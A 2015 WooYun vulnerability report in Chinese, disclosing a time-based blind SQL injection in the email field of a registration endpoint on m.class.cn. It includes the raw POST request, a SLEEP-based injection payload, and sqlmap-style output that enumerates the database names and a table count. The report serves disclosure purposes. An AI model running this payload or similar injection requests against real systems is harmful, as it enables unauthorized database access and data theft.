漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-10-15: 细节已通知厂商并且等待厂商处理中
2015-10-15: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
昨天提交一个,和别人重复了,心情不好了,求满分
详细说明:
1,注入点:
POST http://m.class.cn/user/register_ajax HTTP/1.1
email=aaa%40aa.com&passwd=aaaa1111&conpasswd=aaaa1111&nickName=ffdfsd.x&act=reg
第一个参数Email就有注入
2,看看具体结果
Parameter: email (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: email=aaa@aaa.com' AND (SELECT * FROM (SELECT(SLEEP(5)))SeIC) AND 'KpgP'='KpgP&passwd=aaaa1111&conpasswd=aaaa1111&nickName=aaaa1111&act=reg
---
web application technology: PHP 5.4.10
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] bbsnew
[*] information_schema
3,大概151张表
back-end DBMS: MySQL 5.0.12
[11:56:51] [INFO] fetching tables for database: 'bbsnew'
[11:56:51] [INFO] fetching number of tables for database 'bbsnew'
[11:56:51] [INFO] resumed: 151
[11:56:51] [INFO] resumed: cdb_access
漏洞证明:
如上
修复方案:
求满分
版权声明:转载请注明来源 逆流冰河@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-10-15 16:24
厂商回复:
非常感谢提交漏洞。此漏洞已经修补。
最新状态:
暂无